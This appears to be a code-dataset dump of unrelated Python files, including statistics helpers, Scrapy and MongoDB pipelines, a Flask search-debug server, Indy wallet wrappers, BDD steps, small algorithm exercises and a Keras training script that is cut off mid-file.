text stringlengths 38 1.54M |
|---|
def bootstrap(returns, statistic_fn, size, num_samples):
"""
:returns: Series of returns to sample from
:statistic_fn: Function expecting a single series argument
and returning a scalar value
:size: Size of each bootstrap sample
:num_samples: Number of bootstrap sample to return
Returns a list of statistics calculated on each bootstrap sample
"""
returns = returns[~returns.isna()]
return [
statistic_fn(returns.sample(size, replace=True))
for _ in range(num_samples)
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 15 22:51:07 2017
@author: HP 15 AB032TX
"""
Questions=['what','who','where','how','when','whom','why']
Table=[]
Q=raw_input().split()
G={}
G['faculty']=['faculty','teacher','tutor']
G['attendance']=['presence','turnout','attendance','debarred']
G['subject']=['network','dsa']
G['building']=['sjt','tt','gdn','mb','smv','cdmm']
G['hostel']=['block','hostel']
Extras=['best','worst','top 5','top 3','top 10']
Subjects=[]
Hostel=['a','b','m','d','e','f','g','h','j','p','n','l','k']
def generalise(Q):
for word in range(len(Q)):
for key in G.keys():
if Q[word] in G[key]:
if key=='subject':
Subjects.append(Q[word])
Q[word]=key
def hasHostel(Q):
out=True
for word in Q:
if word=='hostel':
out=True
Table.append('hostel')
break
if out:
for word in Q:
if word in Hostel:
return word
return 'nothing'
return False
def hasQuestion(Q):
for i in Q:
if i in Questions:
return i
return False
return Subjects
def hasattendance(Q):
for word in Q:
if word in G['attendance']:
Table.append('attendance')
return True
return False
def hasFaculty(Q):
out=False
for word in Q:
if word in G['faculty']:
out= True
break
if out:
Table.append('faculty')
return out
def extraKeys(Q):
for word in Q:
if word in Extras:
return word
return ''
query=['Show ']
fQuery=['SELECT ']
generalise(Q)
Asked=0
if hasattendance(Q):
query.append('attendance of')
fQuery.append('attendance')
Asked+=1
if hasFaculty(Q):
query.append(extraKeys(Q))
query.append('faculty of')
fQuery.append('faculty')
Asked+=1
if len(hasHostel(Q))!=7:
fQuery.append('hostel')
query.append('hostel ')
query.append(hasHostel(Q))
fQuery.append('FROM')
Table=list(set(Table))
fQuery+=Table
if hasFaculty(Q) or hasattendance(Q):
fQuery.append('WHERE SUBJECT =')
fQuery+=Subjects
elif len(hasHostel(Q))!=7:
fQuery.append('WHERE HOSTEL =')
fQuery+=hasHostel(Q)
query.append(' and '.join(Subjects))
if Asked>1:
print 'Ask One thing at a time'
else:
print ' '.join(query)
print ' '.join(fQuery)
|
# pylint: disable=wrong-import-order
from __future__ import absolute_import, division, print_function, unicode_literals
from gevent.wsgi import WSGIServer
from flask import Flask, request, render_template
import os
import sys
import json
import requests
sys.path.insert(0, os.getcwd())
from cosrlib.document import load_document_type
from cosrlib.config import config
from cosrlib.searcher import Searcher
from cosrlib.indexer import Indexer
CURRENT_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
app = Flask(
"explainer",
static_folder=os.path.join(CURRENT_DIRECTORY, "static"),
template_folder=os.path.join(CURRENT_DIRECTORY, "templates")
)
indexer = Indexer()
indexer.connect()
searcher = Searcher()
searcher.connect()
@app.route('/')
def route_search():
""" Homepage, for debugging searches """
return render_template("search.html", config={})
@app.route('/url')
def route_url():
""" URL page, for debugging parsing """
return render_template("url.html", config={})
@app.route('/api/searchdebug')
def debug_search():
""" API route for search debug """
query = request.args.get("q")
lang = request.args.get("g") or "en"
results = searcher.search(query, lang=lang, explain=True, fetch_docs=True)
return json.dumps(results)
@app.route('/api/urldebug')
def debug_url():
""" API route for URL debug """
# TODO: have a quota per ip on this API to prevent abuse
url = request.args.get("url")
# Special case for local files
if url.startswith("tests/") and config["ENV"] == "local":
with open(url, "rb") as f:
cnt = f.read()
headers = {}
else:
if not url.startswith("http"):
url = "http://" + url
req = requests.get(url)
cnt = req.content
headers = dict(req.headers)
doc = load_document_type("html", cnt, url=str(url), headers=headers)
parsed = indexer.parse_document(doc)
global_rank, ranking_signals = indexer.ranker.get_global_document_rank(doc, parsed["url_metadata"])
# URL class is not serializable
links = [{
"href": link["href"].url,
"words": link.get("words")
} for link in doc.get_hyperlinks()]
ret = {
"url": parsed["url"].url,
"word_groups": doc.get_word_groups(),
"rank": global_rank,
"title_raw": doc.get_title(),
"title": parsed["title_formatted"],
"summary": parsed["summary_formatted"],
"langs": parsed["langs"],
"links": links,
"ranking_signals": ranking_signals
}
return json.dumps(ret)
def main():
if config["ENV"] == "local":
app.debug = True
print("Explainer listening on http://%s" % config["EXPLAINER"])
sys.stdout.flush()
http_server = WSGIServer((config["EXPLAINER"].split(":")[0], int(config["EXPLAINER"].split(":")[1])), app)
http_server.serve_forever()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
import urllib
import logging
import hashlib
from scrapy.exceptions import DropItem
from eastmoney.BloomFilter import BloomFilter
from scrapy.utils.request import request_fingerprint
from scrapy.utils.python import to_bytes
from w3lib.url import canonicalize_url
logger = logging.getLogger('GuBa_Post')
class EastmoneyPipeline(object):
def process_item(self, item, spider):
return item
class MongoPipeline(object):
def __init__(self,mongo_uri,mongo_db,username,password):
self.mongo_uri = mongo_uri
self.mongo_db = mongo_db
self.username = username
self.password = password
self.collection_name = 'gubapost'
@classmethod
def from_crawler(cls,crawler):
return cls(
mongo_uri = crawler.settings.get('MONGO_URI'),
mongo_db = crawler.settings.get('MONGO_DATABASE'),
username = urllib.quote_plus(crawler.settings.get('MONGO_USER')),
password = urllib.quote_plus(crawler.settings.get('MONGO_PWD'))
)
def open_spider(self,spider):
try:
self.client = pymongo.MongoClient(
self.mongo_uri,
username = self.username,
password = self.password
)
self.db = self.client[self.mongo_db]
except Exception as err:
print(str(err))
def close_spider(self,spider):
self.client.close()
def process_item(self,item,spider):
valid = True
if not item['content']:
valid = False
raise DropItem('missing content of post on %s',item['url'])
if valid:
post = [{
'url':item['url'],
'title':item['title'],
'date':item['date'],
'content':item['content']
}]
self.db[self.collection_name].insert(post)
logger.info('Item wrote into MongoDB database %s/%s'%
(self.mongo_db,self.collection_name))
return item
#使用布隆过滤将item进行过滤,排除已经储存的item,代替url去重进行增量爬取
class DupeFilterPipeline(object):
def __init__(self,redis_host,redis_port,filter_db,filter_key):
self.redis_host = redis_host
self.redis_port = redis_port
self.filter_db = filter_db
self.filter_key = filter_key
self.bf = BloomFilter(redis_host,redis_port,filter_db,blockNum=1,key=filter_key)
@classmethod
def from_crawler(cls,crawler):
return cls(
redis_host=crawler.settings.get('REDIS_HOST'),
redis_port=crawler.settings.get('REDIS_PORT'),
filter_db=crawler.settings.get('FILTER_DB'),
filter_key=crawler.settings.get('FILTER_KEY')
)
def item_seen(self,item):
fp = hashlib.sha1()
fp.update(to_bytes(item['content']))
fp.update(to_bytes(item['author']))
fp.update(to_bytes(canonicalize_url(item['url'])))
fp = fp.hexdigest()
if self.bf.isContains(fp):
return True
else:
self.bf.insert(fp)
return False
def process_item(self,item):
if item_seen(item):
raise DropItem('already parsed content dropped %s',item['content'])
else:
return item
|
class MapCfg:
def __init__(self,field,bytes):
self.field=field
self.bytes=bytes
class Test:
def __init__(self, len, buf):
print('コンストラクタが呼ばれました')
print(buf)
self.len=len
self.head=buf[:6]
self.buf=buf[6:14]
self.tail=buf[14:]
self.dt=()
self.dt2=()
self.parse()
def __del__(self):
print('デストラクタが呼ばれました')
def prt(self):
print('head:'+self.head)
print('dt1:', self.dt)
print('dt2:', self.dt2)
print('tail:'+self.tail)
def parse(self):
self.dt+= (self.buf[:2],)
self.dt+= (self.buf[2:4],)
self.dt+= (self.buf[4:6],)
self.dt+= (self.buf[6:],)
def prs(self,map):
tbuf=self.buf
for m in map:
#print(tbuf)
self.dt2+= (tbuf[:m.bytes],)
tbuf=tbuf[m.bytes:]
map=(MapCfg('u1_dt1',1),MapCfg('u1_dt2',1),MapCfg('u2_dt3',2),MapCfg('u4_dt4',4))
test=Test(10,'01023154876045723590')
test.prt()
test.prs(map)
test.prt() |
## Hyphen RULEBUILDER
import codecs
import os
print('Begin')
TabChar = '\t'
Punctuation = {".", "?", "!", ":", ";", '"', "'", ",", "—", "$", "£",
'″', "′", '”', "´", '*', '(', ')', '¢', '_', '[', ']'}
def strip_punctuation(Token):
"""Strip punctuation marks from the beginning and end of a word"""
TokLis = list(Token)
WordBegun = False
for Index, Char in enumerate(TokLis):
if Char.isalnum():
Token = Token[Index:]
WordBegun = True
break
if not WordBegun:
return ""
# Now in reverse.
LastPos = len(TokLis) - 1
for Index in range(LastPos, 0, -1):
if TokLis[Index].isalnum():
Token = Token[:Index + 1]
break
return Token
## Open the MainDictionary, read it into Lexicon.
print('Loading dictionary.')
FileString = '/Users/tunderwood/Spellcheck/Rules/MainDictionary.txt'
F = codecs.open(FileString, 'r', 'utf-8')
FileLines = F.readlines()
F.close()
Lexicon = set()
for Line in FileLines:
Line = Line.rstrip()
LineParts = Line.split(TabChar)
Word = LineParts[0].rstrip()
Lexicon.add(Word)
Lexicon = frozenset(Lexicon)
del FileLines
OutPath = "/Users/tunderwood/Rules/HyphenRules/"
InPath = "/Users/tunderwood/Rules/FileSources/"
DirList = os.listdir(InPath)
SyncoFreq = {}
SyncoCorr = {}
HyphFreq = {}
Count = 0
DocLen = len(DirList)
Tenth = int(DocLen/10)
Tenths = frozenset(range(Tenth, DocLen+Tenth, Tenth))
TenthCount = 10
for FileName in DirList:
if FileName[0] == '.' or FileName[-1] != 't':
print('Skipping hidden file', FileName)
continue
Count += 1
if Count in Tenths:
print(TenthCount,'%', sep='')
TenthCount += 10
FileString = InPath + FileName
F = codecs.open(FileString, 'r', 'utf-8')
Document = F.readlines()
F.close()
DVector = []
for Line in Document:
Line = Line.rstrip()
if Line == '' or Line.isdigit():
continue
## Split each line into words after replacing certain problematic substrings.
Line = Line.replace('äî', ' ')
Line = Line.replace('Äî', ' ')
Line = Line.replace('ñ™', ' ')
Line = Line.replace(chr(8218), ' ')
Line = Line.replace(chr(8212), ' ')
Line = Line.replace(".", " ")
Line = Line.replace(",", " ")
Line = Line.replace("--", " ")
Line = Line.replace("_", " ")
Line = Line.replace('▪', ' ')
Line = Line.replace(';', ' ')
Line = Line.replace('"', ' ')
Line = Line.replace('[', ' ')
Line = Line.replace(']', ' ')
Line = Line.replace('!', ' ')
Line = Line.replace('?', ' ')
Line = Line.replace('&', ' ')
Line = Line.replace(':', ' ')
Line = Line.replace('|', '')
Line = Line.replace(chr(8739), '')
Line = Line.replace('{', '')
Line = Line.replace('}', '')
Line = Line.replace('′', "'")
Line = Line.replace('´', "'")
WordList = Line.split()
# Extend the doc vector by adding these words.
DVector.extend(WordList)
for Index, Word in enumerate(DVector):
Word = Word.lower()
Word = strip_punctuation(Word)
if len(Word) < 2:
continue
if Word[-2:] == "'s":
Word = Word[:-2]
if Word[-2:] == "'d":
ThreeWord = Word[:-3] + "ied"
TwoWord = Word[:-2] + "ed"
if TwoWord in Lexicon:
CorrectWord = TwoWord
elif ThreeWord in Lexicon:
CorrectWord = ThreeWord
else:
CorrectWord = "n/a"
if Word in SyncoCorr:
SyncoFreq[Word] += 1
else:
SyncoCorr[Word] = CorrectWord
SyncoFreq[Word] = 1
if "-" in Word:
if Word in HyphFreq:
HyphFreq[Word] += 1
else:
HyphFreq[Word] = 1
print('Done initial read.')
WriteList = []
for Word, Freq in SyncoFreq.items():
Line = Word + '\t' + SyncoCorr[Word] + '\t' + str(Freq) + '\n'
WTuple = (Freq, Line)
WriteList.append(WTuple)
WriteList = sorted(WriteList, key = lambda Pair: Pair[0], reverse = True)
FileString = OutPath + 'Syncopates.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
Freq, Line = WTuple
F.write(Line)
F.close()
del WriteList
del SyncoFreq
del SyncoCorr
WriteList = []
for Word, Freq in HyphFreq.items():
Line = (Word, Freq)
WriteList.append(Line)
WriteList = sorted(WriteList, key = lambda Pair: Pair[1], reverse = True)
FileString = OutPath + 'HyphFreq.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
Word, Freq = WTuple
Line = Word + '\t' + str(Freq) + '\n'
F.write(Line)
F.close()
del WriteList
print('Exported HyphFreq.')
# Generate a dictionary containing all first elements in the list of hyphenated terms,
# another dictionary containing tuples of the separate elements,
# and a third containing the elements fused as a word.
FirstParts = {}
TupleFreq = {}
FusedFreq = {}
for Word, Freq in HyphFreq.items():
First, Sep, Second = Word.partition("-")
if First in FirstParts:
FirstParts[First] += 1
elif Second != "" and First.isalnum():
FirstParts[First] = 1
## There are some hidden consequences of that elif, because we only check tuple
## versions in cases where the first element is in FirstParts.
if Freq < 5:
continue
Unhyphed = Word.replace('-', ' ')
WordTuple = tuple(Unhyphed.split())
TupleFreq[WordTuple] = 0
Fused = Word.replace('-', '')
FusedFreq[Fused] = 0
## Count the fused and tuple versions.
Count = 0
Total = 0
for FileName in DirList:
if FileName[0] == '.' or FileName[0] == 'K' or FileName[-1] != 't':
continue
print(FileName)
FileString = InPath + FileName
F = codecs.open(FileString, 'r', 'utf-8')
Document = F.readlines()
F.close()
DVector = []
for Line in Document:
Line = Line.rstrip()
if Line == '' or Line.isdigit():
continue
## Split each line into words after replacing certain problematic substrings.
Line = Line.replace('äî', ' ')
Line = Line.replace('Äî', ' ')
Line = Line.replace('ñ™', ' ')
Line = Line.replace(chr(8218), ' ')
Line = Line.replace(chr(8212), ' ')
Line = Line.replace(".", " ")
Line = Line.replace(",", " ")
Line = Line.replace("--", " ")
Line = Line.replace("_", " ")
Line = Line.replace('▪', ' ')
Line = Line.replace(';', ' ')
Line = Line.replace('"', ' ')
Line = Line.replace('[', ' ')
Line = Line.replace(']', ' ')
Line = Line.replace('!', ' ')
Line = Line.replace('?', ' ')
Line = Line.replace('&', ' ')
Line = Line.replace(':', ' ')
Line = Line.replace('|', '')
Line = Line.replace(chr(8739), '')
Line = Line.replace('{', '')
Line = Line.replace('}', '')
Line = Line.replace('′', "'")
Line = Line.replace('´', "'")
WordList = Line.split()
# Extend the doc vector by adding these words.
DVector.extend(WordList)
Total += len(DVector)
Count += 1
for Index, Word in enumerate(DVector):
Word = Word.lower()
Word = strip_punctuation(Word)
if len(Word) < 1:
continue
if Word in FusedFreq:
FusedFreq[Word] += 1
if Word not in FirstParts:
continue
TwoWord = tuple(DVector[Index: Index+2])
if TwoWord in TupleFreq:
TupleFreq[TwoWord] += 1
continue
ThreeWord = tuple(DVector[Index: Index+3])
if ThreeWord in TupleFreq:
TupleFreq[ThreeWord] += 1
# Write the frequencies of hyphenated, fused, and split versions.
Average = int(Total/Count)
print('Average word length', Average)
WriteList = []
for Word, Freq in HyphFreq.items():
Unhyphed = Word.replace('-', ' ')
WordTuple = tuple(Unhyphed.split())
Fused = Word.replace('-', '')
Fuse = FusedFreq.get(Fused, 0) * 10
Tup = TupleFreq.get(WordTuple, 0) * 10
# Does the word mostly occur hyphenated, fused, split, or is it ambiguous?
if Freq > Fuse and Freq > Tup:
Most = "H"
elif Fuse > Freq and Fuse > Tup:
Most = "F"
elif Tup > Freq and Tup > Fuse:
Most = "S"
else:
Most = "A"
if Fused in Lexicon:
Most = "D"
Line = Word + '\t' + str(Freq) + '\t' + str(Fuse) + '\t' + str(Tup) + '\t' + Most + '\n'
WTuple = Most, Freq, Line
WriteList.append(WTuple)
WriteList = sorted(WriteList, key = lambda Element: Element[1], reverse = True)
WriteList = sorted(WriteList, key = lambda Element: Element[0])
FileString = OutPath + 'Hyphenates.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
Most, Freq, Line = WTuple
F.write(Line)
F.close()
del WriteList
|
# -*- encoding: utf-8 -*-
# 没啥算法 需要实现一个通过value找key
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
def get_key (dict, value):
return [k for k, v in dict.items() if v == value]
if len(s) != len(t):
return False
dic = {}
for i in range(0, len(s)):
if s[i] in dic:
if dic[s[i]] != t[i]:
return False
elif get_key(dic, t[i]):
return False
dic[s[i]] = t[i]
return True |
#-*- coding:utf-8 -*-
import json
import types
from behave import *
from test import bdd_util
from features.testenv.model_factory import *
from django.test.client import Client
from django.contrib.auth.models import User
from mall.models import ProductLimitZoneTemplate
from tools.regional.models import City, Province
@then(u"{user}能获得限定区域列表")
def step_impl(context, user):
url = '/mall2/product_limit_zone/'
response = context.client.get(url)
templates = response.context['templates']
expected = json.loads(context.text)
actual = []
for template in templates:
template_data = {}
template_data['name'] = template['templateName']
limit_area = []
for zone in template['zones']:
zone_data = {}
if zone['zoneName'] in [u'直辖市', u'其它']:
zone_data['area'] = zone['zoneName']
province_list = []
for province in zone['provinces']:
province_list.append(province['provinceName'])
zone_data['province'] = province_list
limit_area.append(zone_data)
else:
for province in zone['provinces']:
zone_data = {}
zone_data['area'] = province['zoneName']
zone_data['province'] = province['provinceName']
zone_data['city'] = []
for city in province['cities']:
zone_data['city'].append(city['cityName'])
limit_area.append(zone_data)
template_data['limit_area'] = limit_area
template_data["actions"] = [u"修改", u"删除"]
actual.append(template_data)
bdd_util.assert_list(expected, actual)
@when(u"{user}添加限定区域配置")
def step_impl(context, user):
data = json.loads(context.text)
url = '/mall2/api/product_limit_zone_template/?_method=put'
template_name = data['name']
provinces = []
cities = []
for limit_area in data['limit_area']:
if type(limit_area['province']) is types.UnicodeType:
provinces.append(limit_area['province'])
if type(limit_area['province']) is types.ListType:
provinces += limit_area['province']
if limit_area.has_key('city'):
cities += limit_area['city']
province_ids = []
for province in provinces:
province_ids.append(str(Province.objects.filter(name__contains=province).first().id))
city_ids = City.objects.filter(name__in=cities).values_list('id', flat=True)
args = {
'template_name': template_name,
'province_ids': json.dumps(province_ids),
'city_ids': json.dumps([str(id) for id in city_ids])
}
response = context.client.post(url, args)
bdd_util.assert_api_call_success(response)
@when(u"{user}修改'{template_name}'限定区域配置")
def step_impl(context, user, template_name):
user = User.objects.filter(username=user)
template_id = ProductLimitZoneTemplate.objects.filter(owner=user, name=template_name).first().id
data = json.loads(context.text)
url = '/mall2/api/product_limit_zone_template/'
template_name = data['name']
provinces = []
cities = []
for limit_area in data['limit_area']:
if type(limit_area['province']) is types.UnicodeType:
provinces.append(limit_area['province'])
if type(limit_area['province']) is types.ListType:
provinces += limit_area['province']
if limit_area.has_key('city'):
cities += limit_area['city']
province_ids = []
for province in provinces:
province_ids.append(str(Province.objects.filter(name__contains=province).first().id))
city_ids = City.objects.filter(name__in=cities).values_list('id', flat=True)
args = {
'template_id': template_id,
'template_name': template_name,
'province_ids': json.dumps(province_ids),
'city_ids': json.dumps([str(id) for id in city_ids])
}
response = context.client.post(url, args)
bdd_util.assert_api_call_success(response)
@when(u"{user}删除'{template_name}'限定区域配置")
def step_impl(context, user, template_name):
user = User.objects.filter(username=user)
template_id = ProductLimitZoneTemplate.objects.filter(owner=user, name=template_name).first().id
url = "/mall2/api/product_limit_zone/?_method=delete"
response = context.client.post(url, {'template_id': template_id})
bdd_util.assert_api_call_success(response) |
from unittest.case import TestCase
from pandas import DataFrame
from probability.calculations.bayes_rule import MultipleBayesRule
from probability.discrete.discrete import Discrete
class TestChapter01(TestCase):
def setUp(self) -> None:
# cookies
self.bowl_1_and_chocolate = 0.125
self.bowl_1_and_vanilla = 0.375
self.bowl_2_and_chocolate = 0.25
self.bowl_2_and_vanilla = 0.25
cookie_data = TestChapter01.make_cookies_observations()
self.cookies = Discrete.from_observations(cookie_data)
self.vanilla = self.cookies.p(flavor='vanilla')
self.vanilla__bowl_1 = self.cookies.given(
bowl='bowl 1').p(flavor='vanilla')
self.vanilla__bowl_2 = self.cookies.given(
bowl='bowl 2').p(flavor='vanilla')
self.bowl = Discrete.from_probs({
'bowl 1': 0.5, 'bowl 2': 0.5},
variables=['bowl']
)
self.bowl_1 = self.bowl.p(bowl='bowl 1')
self.bowl_2 = self.bowl.p(bowl='bowl 2')
# m & m's
self.mix_1994 = Discrete.from_probs({
'brown': 0.3, 'yellow': 0.2, 'red': 0.2,
'green': 0.1, 'orange': 0.1, 'tan': 0.1
}, variables='color')
self.mix_1996 = Discrete.from_probs({
'blue': 0.24, 'green': 0.2, 'orange': 0.16,
'yellow': 0.14, 'red': 0.13, 'brown': 0.13
}, variables='color')
self.bag = Discrete.from_probs({1994: 0.5, 1996: 0.5}, variables='bag')
@staticmethod
def make_cookies_observations() -> DataFrame:
return DataFrame({
'bowl': ['bowl 1'] * 40 + ['bowl 2'] * 40,
'flavor': (
['vanilla'] * 30 + ['chocolate'] * 10 +
['vanilla'] * 20 + ['chocolate'] * 20
)
})
def test__01_03(self):
data = self.cookies.data
self.assertEqual(data.loc[('bowl 1', 'chocolate')],
self.bowl_1_and_chocolate)
self.assertEqual(data.loc[('bowl 1', 'vanilla')],
self.bowl_1_and_vanilla)
self.assertEqual(data.loc[('bowl 2', 'chocolate')],
self.bowl_2_and_chocolate)
self.assertEqual(data.loc[('bowl 2', 'vanilla')],
self.bowl_2_and_vanilla)
def test__01_04(self):
self.assertEqual(self.bowl_1, 0.5)
self.assertEqual(self.vanilla__bowl_1, 0.75)
self.assertEqual(0.625, self.vanilla)
bowl_1__vanilla = self.bowl_1 * self.vanilla__bowl_1 / self.vanilla
self.assertEqual(0.6, bowl_1__vanilla)
self.assertEqual(
0.6, self.cookies.given(flavor='vanilla').p(bowl='bowl 1')
)
def test__01_05(self):
self.assertEqual(self.bowl_2, 0.5)
vanilla__bowl_2 = self.cookies.given(
bowl='bowl 2').p(flavor='vanilla')
self.assertEqual(0.5, vanilla__bowl_2)
vanilla = (
self.bowl_1 * self.vanilla__bowl_1 +
self.bowl_2 * self.vanilla__bowl_2
)
self.assertEqual(0.625, vanilla)
def test__01_06(self):
yellow__1994 = self.mix_1994.p(color='yellow')
yellow__1996 = self.mix_1996.p(color='yellow')
green__1994 = self.mix_1994.p(color='green')
green__1996 = self.mix_1996.p(color='green')
likelihood_a = yellow__1994 * green__1996
likelihood_b = yellow__1996 * green__1994
prior_likelihood_a = self.bag.p(bag=1994) * likelihood_a
prior_likelihood_b = self.bag.p(bag=1996) * likelihood_b
evidence = prior_likelihood_a + prior_likelihood_b
self.assertAlmostEqual(20 / 27, prior_likelihood_a / evidence, 10)
self.assertAlmostEqual(7 / 27, prior_likelihood_b / evidence, 10)
# using BayesRule
priors = {'a': 0.5, 'b': 0.5}
likelihoods = {
'a': yellow__1994 * green__1996,
'b': yellow__1996 * green__1994
}
bayes_rule = MultipleBayesRule(
prior=priors, likelihood=likelihoods
)
posterior = bayes_rule.posterior()
self.assertAlmostEqual(20 / 27, posterior['a'], 10)
self.assertAlmostEqual(7 / 27, posterior['b'], 10)
def test__01_07(self):
priors = {'a': 1 / 3, 'b': 1 / 3, 'c': 1 / 3}
likelihoods = {'a': 1 / 2, 'b': 0, 'c': 1}
posterior = MultipleBayesRule(
prior=priors, likelihood=likelihoods
).posterior()
self.assertEqual(posterior['a'], 1 / 3)
self.assertEqual(posterior['b'], 0)
self.assertEqual(posterior['c'], 2 / 3)
likelihoods = {'a': 1, 'b': 0, 'c': 1}
posterior = MultipleBayesRule(
prior=priors, likelihood=likelihoods
).posterior()
self.assertEqual(posterior['a'], 1 / 2)
self.assertEqual(posterior['b'], 0)
self.assertEqual(posterior['c'], 1 / 2)
|
exclude = ('.', ',', '\"', '!', '?')
def handleFile(file):
try:
with open(file, 'r') as f:
data = f.readlines()
except FileNotFoundError:
print(file + 'not found.')
else:
data = [d.strip() for d in data]
pWords = ' '.join(data).split(' ')
words = set()
for word in pWords:
s = ''.join(ch for ch in word if ch not in exclude)
if s != '':
words.add(s.lower())
return words
words1 = handleFile('file1.txt')
words2 = handleFile('file2.txt')
print('\nAll unique words contained in both files:')
print(words1 | words2)
print('\nWords common to both files:')
print(words1 & words2)
print('\nWords in file1 but not in file2:')
print(words1 - words2)
print('\nWords in file2 but not in file1:')
print(words2 - words1)
print('\nWords in file1 or file2, but not both:')
print(words1 ^ words2)
|
#!C:\Users\Vaibhavi Raut\AppData\Local\Programs\Python\Python37
'''
WAP to accept a list of integers from user to sort them using bubble sort.
it checks adjacent numbers in per iteration
'''
'''
def sort_recur(x,n):
if n==1:
return
for i in range(n+1):
if(x[i]>x[i+1]):
#swap(x[i],x[j]) #swap func won't work becoz it is swap by value not reference.
temp = x[i]
x[i] = x[i+1]
x[i+1] = temp
print(x)
return sort_recur(x,n-1)
'''
def sort(x,n):
for i in range(n):
for j in range(0,n-i-1):
if(x[j]>x[j+1]):
#swap(x[i],x[j]) #swap func won't work becoz it is swap by value not reference.
temp = x[j]
x[j] = x[j+1]
x[j+1] = temp
print(x)
return x
def main():
x = eval(input("Enter an integer List: "))
print("Iterations:")
print("Sorted List: ",sort(x,len(x)))
#print("Sorted List: ",)
if __name__=='__main__':
main()
'''
Enter an integer List: [3,2,4,1,5]
Iterations:
[2, 3, 4, 1, 5]
[2, 3, 4, 1, 5]
[2, 3, 1, 4, 5]
[2, 3, 1, 4, 5]
[2, 3, 1, 4, 5]
[2, 1, 3, 4, 5]
[2, 1, 3, 4, 5]
[1, 2, 3, 4, 5]
[1, 2, 3, 4, 5]
[1, 2, 3, 4, 5]
Sorted List: [1, 2, 3, 4, 5]
'''
|
""" Wrappers around Indy-SDK functions to overcome shortcomings in the SDK.
"""
import json
from indy import did, crypto, non_secrets, error
async def create_and_store_my_did(wallet_handle):
""" Create and store my DID, adding a map from verkey to DID using the
non_secrets API.
"""
(my_did, my_vk) = await did.create_and_store_my_did(wallet_handle, '{}')
await non_secrets.add_wallet_record(
wallet_handle,
'key-to-did',
my_vk,
my_did,
'{}'
)
return (my_did, my_vk)
async def store_their_did(wallet_handle, their_did, their_vk):
""" Store their did, adding a map from verkey to DID using the non_secrets
API.
"""
await did.store_their_did(
wallet_handle,
json.dumps({
'did': their_did,
'verkey': their_vk,
})
)
await non_secrets.add_wallet_record(
wallet_handle,
'key-to-did',
their_vk,
their_did,
'{}'
)
async def did_for_key(wallet_handle, key):
""" Retrieve DID for a given key from the non_secrets verkey to DID map.
"""
did = None
try:
did = json.loads(
await non_secrets.get_wallet_record(
wallet_handle,
'key-to-did',
key,
'{}'
)
)['value']
except error.IndyError as e:
if e.error_code is error.ErrorCode.WalletItemNotFound:
pass
else:
raise e
return did
async def get_wallet_records(wallet_handle: int, search_type: str) -> list:
""" Search for records of a given type in a wallet.
:param wallet_handle: Handle of the wallet to search.
:param search_type: Type of records to search.
:return: List of all records found.
"""
list_of_records = []
search_handle = await non_secrets.open_wallet_search(wallet_handle,
search_type,
json.dumps({}),
json.dumps({'retrieveTotalCount': True}))
while True:
results_json = await non_secrets.fetch_wallet_search_next_records(wallet_handle,
search_handle, 10)
results = json.loads(results_json)
if results['totalCount'] == 0 or results['records'] is None:
break
for record in results['records']:
record_value = json.loads(record['value'])
record_value['_id'] = record['id']
list_of_records.append(record_value)
await non_secrets.close_wallet_search(search_handle)
return list_of_records
|
"""
.. module:: ConvoBatch
ConvoBatch
*************
Trains a model according to a configuration file (--batch) or the harcoded config object
It uses the files for each individual day
Model is trained using the train_on_batch method from Keras model, so only a day is loaded in memory at a time
:Description: ConvoBatch
:Authors: bejar
:Version:
:Created on: 23/12/2016 15:05
"""
import argparse
import keras.models
from Traffic.Models.SimpleModels import simple_model
from Traffic.Private.DBConfig import mongoconnection
from Traffic.Util.ConvoTrain import load_dataset
from Traffic.Util.ConvoTrain import transweights, train_model_batch
from Traffic.Util.DataGenerators import list_days_generator
from keras import backend as K
from pymongo import MongoClient
from Traffic.Util.Misc import load_config_file, transweights
__author__ = 'bejar'
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--batch', help='Non interactive run', action='store_true', default=False)
parser.add_argument('--config', default='config', help='Experiment configuration')
parser.add_argument('--resume', default=None, help='Resume existing experiment training')
parser.add_argument('--retrain', default=None, help='Continue existing experiment training')
args = parser.parse_args()
if args.batch:
config = load_config_file(args.config)
ldaysTr = []
for y, m, di, df in config['traindata']:
ldaysTr.extend(list_days_generator(y, m, di, df))
config['traindata'] = ldaysTr
ldaysTs = []
for y, m, di, df in config['testdata']:
ldaysTs.extend(list_days_generator(y, m, di, df))
config['testdata'] = ldaysTs
else:
ldaysTr = list_days_generator(2016, 11, 1, 30)
ldaysTs = list_days_generator(2016, 12, 1, 2)
classweight = {0: 1.0, 1: 1.0, 2: 2.0, 3: 3.0, 4: 4.0}
config = {
'datapath': '/home/bejar/storage/Data/Traffic/Datasets/',
'savepath': '/home/bejar/storage/Data/Traffic/Models/',
'traindata': ldaysTr,
'testdata': ldaysTs,
'rebalanced': False,
'zfactor': 0.25,
'model': 4,
'convolayers':
{'sizes': [128, 64, 32],
'convofields': [3, 3],
'dpconvo': 0.2,
'pool': ['max', 2, 2]},
'fulllayers':
{'sizes': [64, 32],
'regfull': ['l1', 0.2]},
'optimizer':
{'method': 'sdg',
'params':
{'lrate': 0.005,
'momentum': 0.9,
'nesterov': False,
'decay': 0
}},
"train":
{"batchsize": 256,
"epochs": 200,
"classweight": transweights(classweight)},
'imgord': 'th'
}
# config['optimizer']['params']['decay'] = config['lrate'] / config['epochs']
K.set_image_dim_ordering(config['imgord'])
# Only the test set in memory, the training is loaded in batches
_, test, test_labels, num_classes = load_dataset(config, only_test=True, imgord=config['imgord'])
config['input_shape'] = test[0][0].shape
config['num_classes'] = num_classes
resume = None
if args.retrain is not None: # Retwork already trained
client = MongoClient(mongoconnection.server)
db = client[mongoconnection.db]
db.authenticate(mongoconnection.user, password=mongoconnection.passwd)
col = db[mongoconnection.col]
vals = col.find_one({'_id': int(args.retrain)}, {'config': 1})
if vals is None:
raise ValueError('This experiment does not exist ' + args.retrain)
else:
if config['zfactor'] != vals['config']['zfactor']:
raise ValueError('Incompatible Data')
weights = config['train']['classweight']
for w in weights:
if weights[w] != vals['config']['train']['classweight'][w]:
